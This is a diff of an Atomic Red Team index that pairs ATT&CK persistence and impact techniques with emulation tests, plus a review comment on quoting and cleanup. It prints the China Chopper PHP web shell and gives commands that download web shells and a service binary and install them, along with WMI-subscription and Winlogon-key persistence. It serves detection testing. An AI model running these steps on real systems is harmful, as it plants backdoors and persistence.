These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false + atomic_tests: [] + T1505.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1505.003 + url: https://attack.mitre.org/techniques/T1505/003 + - external_id: CAPEC-650 + source_name: capec + url: https://capec.mitre.org/data/definitions/650.html + - source_name: Lee 2013 + description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down + the China Chopper Web Shell - Part I. Retrieved March 27, 2015. + url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Shell + description: "Adversaries may backdoor web servers with web shells to establish + persistent access to systems. A Web shell is a Web script that is placed on + an openly accessible Web server to allow an adversary to use the Web server + as a gateway into a network. 
A Web shell may provide a set of functions to + execute or a command-line interface on the system that hosts the Web server.\n\nIn + addition to a server-side script, a Web shell may have a client interface + program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) + Web shell client).(Citation: Lee 2013) " + id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-09-16T19:34:19.752Z' + created: '2019-12-13T16:46:18.927Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Adversary access to Web server with vulnerability or account to upload and + serve the Web shell file. + x_mitre_permissions_required: + - SYSTEM + - User + x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms + of persistent remote access, they do not initiate connections. The portion + of the Web shell that is on the server may be small and innocuous looking. + The PHP version of the China Chopper Web shell, for example, is the following + short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, + detection mechanisms exist. Process monitoring may be used to detect Web servers + that perform suspicious actions such as running cmd.exe or accessing files + that are not in the Web directory. File monitoring may be used to detect changes + to files in the Web directory of a Web server that do not match with updates + to the Web server's content and may indicate implantation of a Web shell script. + Log authentication attempts to the server and any unusual traffic patterns + to or from the server and internal network. 
(Citation: US-CERT Alert TA15-314A + Web Shells) " + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Linux + - Windows + - macOS + identifier: T1505.003 + atomic_tests: + - name: Web Shell Written to Disk + auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 + description: | + This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. + Idea from APTSimulator. + cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx + supported_platforms: + - windows + input_arguments: + web_shell_path: + description: The path to drop the web shell + type: string + default: C:\inetpub\wwwroot + web_shells: + description: Path of Web Shell + type: path + default: PathToAtomicsFolder\T1505.003\src\ + dependency_executor_name: powershell + dependencies: + - description: 'Web shell must exist on disk at specified location (#{web_shells}) + +' + prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" + executor: + command: 'xcopy #{web_shells} #{web_shell_path} + +' + cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 + +' + name: command_prompt + T1546.003: + technique: + external_references: + - source_name: mitre-attack + 
external_id: T1546.003 + url: https://attack.mitre.org/techniques/T1546/003 + - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf + description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the + Front Lines. Retrieved May 18, 2016.' + source_name: Mandiant M-Trends 2015 + - source_name: FireEye WMI SANS 2015 + url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf + description: Devon Kerr. (2015). There's Something About WMI. Retrieved May + 4, 2020. + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.secureworks.com/blog/wmi-persistence + description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, + March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. + source_name: Dell WMI Persistence + - source_name: Microsoft MOF May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- + description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved + January 24, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s + WMI Persistence. Retrieved October 11, 2019. + url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 + source_name: Medium Detecting WMI Persistence + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). 
Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' + - source_name: Microsoft Register-WmiEvent + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 + description: Microsoft. (n.d.). Retrieved January 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Management Instrumentation Event Subscription + description: |- + Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) + + Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) + + WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. 
+ id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.094Z' + created: '2020-01-24T14:07:56.276Z' + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1) + + Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'WMI: WMI Creation' + x_mitre_platforms: + - Windows + identifier: T1546.003 + atomic_tests: + - name: Persistence via WMI Event Subscription + auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 + description: | + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. 
+ + Code references + + https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + + https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + supported_platforms: + - windows + executor: + command: | + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; + $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} + $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + + $FilterToConsumerArgs = @{ + Filter = [Ref] $Filter; + Consumer = [Ref] $Consumer; + } + $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs + cleanup_command: | + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject + name: powershell + elevation_required: true + T1543.003: + technique: + created: '2020-01-17T19:13:50.402Z' + modified: 
'2020-09-16T15:49:58.490Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1543.003 + url: https://attack.mitre.org/techniques/T1543/003 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 + description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service + was installed in the system. Retrieved August 7, 2018.' + source_name: Microsoft 4697 APR 2017 + - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection + description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding + to help with intrusion detection. Retrieved August 7, 2018. + source_name: Microsoft Windows Event Forwarding FEB 2018 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Service + description: "Adversaries may create or modify Windows services to repeatedly + execute malicious payloads as part of persistence. 
When Windows boots up, + it starts programs or applications called services that perform background + system functions.(Citation: TechNet Services) Windows service configuration + information, including the file path to the service's executable or recovery + programs/commands, is stored in the Windows Registry. Service configurations + can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). + \n\nAdversaries may install a new service or modify an existing service by + using system utilities to interact with services, by directly modifying the + Registry, or by using custom tools to interact with the Windows API. Adversaries + may configure services to execute at startup in order to persist on a system.\n\nAn + adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) + by using a service name from a related operating system or benign software, + or by modifying existing services to make detection analysis more challenging. + Modifying existing services may interrupt their functionality or may enable + services that are disabled or otherwise not commonly used. \n\nServices may + be created with administrator privileges but are executed under SYSTEM privileges, + so an adversary may also use a service to escalate privileges from administrator + to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). 
" + id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 + x_mitre_contributors: + - Matthew Demaske, Adaptforward + - Travis Smith, Tripwire + - Pedro Harrison + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor processes and command-line arguments for actions + that could create or modify services. Command-line invocation of tools capable + of adding or modifying services may be unusual, depending on how systems are + typically used in a particular environment. Services may also be modified + through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional + logging may need to be configured to gather the appropriate data. Remote access + tools with built-in features may also interact directly with the Windows API + to perform these functions outside of typical system utilities. Collect service + utility execution and service binary path arguments used for analysis. Service + binary paths may even be changed to execute commands or scripts. \n\nLook + for changes to service Registry entries that do not correlate with known software, + patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. + Changes to the binary path and the service startup type changed from manual + or disabled to automatic, if it does not typically do so, may be suspicious. 
+ Tools such as Sysinternals Autoruns may also be used to detect system service + changes that could be attempts at persistence.(Citation: TechNet Autoruns) + \ \n\nCreation of new services may generate an alterable event (ex: Event + ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft + Windows Event Forwarding FEB 2018)). New, benign services may be created during + installation of new software.\n\nSuspicious program execution through services + may show up as outlier processes that have not been seen before when compared + against historical data. Look for abnormal process call trees from known services + and for execution of other commands that could relate to Discovery or other + adversary techniques. Data and events should not be viewed in isolation, but + as part of a chain of behavior that could lead to other activities, such as + network connections made for Command and Control, learning details about the + environment through Discovery, and Lateral Movement." + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1543.003 + atomic_tests: + - name: Modify Fax service to run PowerShell + auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f + description: | + This test will temporarily modify the service Fax by changing the binPath to PowerShell + and will then revert the binPath change, restoring Fax to its original state. + Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. 
+ supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: | + sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" + sc start Fax + cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul + 2>&1 + - name: Service Installation CMD + auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 + description: | + Download an executable from github and start it as a service. + Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_CMD + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: command_prompt + elevation_required: true + command: | + sc.exe create #{service_name} binPath= #{binary_path} + sc.exe start #{service_name} + cleanup_command: | + sc.exe stop #{service_name} >nul 2>&1 + sc.exe delete #{service_name} >nul 2>&1 + - name: Service Installation PowerShell + auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + description: | + Installs A Local Service via PowerShell. 
+ Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_PowerShell + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: powershell + elevation_required: true + command: | + New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" + Start-Service -Name "#{service_name}" + cleanup_command: | + Stop-Service -Name "#{service_name}" 2>&1 | Out-Null + try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} + catch {} + T1547.004: + technique: + created: '2020-01-24T16:59:59.688Z' + modified: '2020-04-21T16:00:41.277Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 + description: "Adversaries may abuse features of Winlogon to execute DLLs and/or + executables when a user logs in. Winlogon.exe is a Windows component responsible + for actions at logon/logoff as well as the secure attention sequence (SAS) + triggered by Ctrl-Alt-Delete. 
Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper + programs and functionalities that support Winlogon. (Citation: Cylance Reg + Persistence Sept 2013) \n\nMalicious modifications to these Registry keys + may cause Winlogon to load and execute malicious DLLs and/or executables. + Specifically, the following subkeys have been known to be possibly vulnerable + to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify + - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit + - points to userinit.exe, the user initialization program executed when a + user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell + executed when a user logs on\n\nAdversaries may take advantage of these features + to repeatedly execute malicious code and establish persistence." + name: Winlogon Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.004 + url: https://attack.mitre.org/techniques/T1547/004 + - external_id: CAPEC-579 + source_name: capec + url: https://capec.mitre.org/data/definitions/579.html + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + + Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.004 + atomic_tests: + - name: Winlogon Shell Key Persistence - PowerShell + auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + description: | + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. 
+ supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Shell" "explorer.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Userinit Key Persistence - PowerShell + auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + description: | + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Notify Key Logon Persistence - PowerShell + auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 + description: | + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + + Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. 
+ supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + executor: + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force + cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + -Force -ErrorAction Ignore + +' + name: powershell + T1547.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.013 + url: https://attack.mitre.org/techniques/T1547/013 + - description: Free Desktop. (2006, February 13). Desktop Application Autostart + Specification. Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html + source_name: Free Desktop Application Autostart Feb 2006 + - description: Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. + Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html + source_name: Free Desktop Entry Keys + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: XDG Autostart Entries + description: |- + Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. 
By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006) + + Within an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys) + + Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs. + id: attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T15:55:10.103Z' + created: '2019-09-10T18:13:12.195Z' + x_mitre_is_subtechnique: true + x_mitre_contributors: + - Tony Lambert, Red Canary + x_mitre_detection: "Malicious XDG autostart entries may be detected by auditing + file creation and modification events within the /etc/xdg/autostart + and ~/.config/autostart directories. Depending on individual + configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME + or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. + Autostart entry files not associated with legitimate packages may be considered + suspicious. 
Suspicious entries can also be identified by comparing entries + to a trusted system baseline.\n \nSuspicious processes or scripts spawned + in this manner will have a parent process of the desktop component implementing + the XDG specification and will execute as the logged on user." + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_permissions_required: + - User + - root + x_mitre_platforms: + - Linux + atomic_tests: [] impact: T1531: technique: + created: '2019-10-09T18:48:31.906Z' + modified: '2020-07-14T19:15:29.911Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern + id: attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0 + description: |- + Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. + + Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) + name: Account Access Removal + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - url: https://attack.mitre.org/techniques/T1531 source_name: mitre-attack 
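Review bot: in the 'Service Installation CMD' test, `sc.exe create #{service_name} binPath= #{binary_path}` leaves the path unquoted, whereas the PowerShell variant passes `-BinaryPathName "#{binary_path}"`; if PathToAtomicsFolder expands to a directory with a space in it, cmd splits the argument at that space and sc.exe registers the wrong image path, so write it as `sc.exe create #{service_name} binPath= "#{binary_path}"`. Three smaller points in the same hunk: the Fax test's cleanup hardcodes `sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"` instead of recording the pre-test value, so on a host whose Fax service already pointed elsewhere the cleanup alters rather than restores state; the 'Winlogon Notify Key Logon Persistence' test says `atomicNotificationPackage.dll` "will execute" on logon but declares no `dependencies`/`prereq_command` for `#{binary_to_execute}` (default `C:\Windows\Temp\atomicNotificationPackage.dll`) the way the T1543.003 tests do with `Test-Path`, so either add the prereq or reword the description to state that only the registry value is written; and the T1547.013 description reads 'with execute after user logon' where 'will execute after user logon' is meant, which comes from the upstream ATT&CK STIX text and should be reported there rather than patched in the generated index.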
@@ -43272,22 +45860,22 @@ impact: url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ description: Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Account Access Removal - description: |- - Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. - - Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) - id: attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-07-14T19:15:29.911Z' - created: '2019-10-09T18:48:31.906Z' - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'User Account: User Account Deletion' + - 'User Account: User Account Modification' + - 'Active Directory: Active Directory Object Modification' + 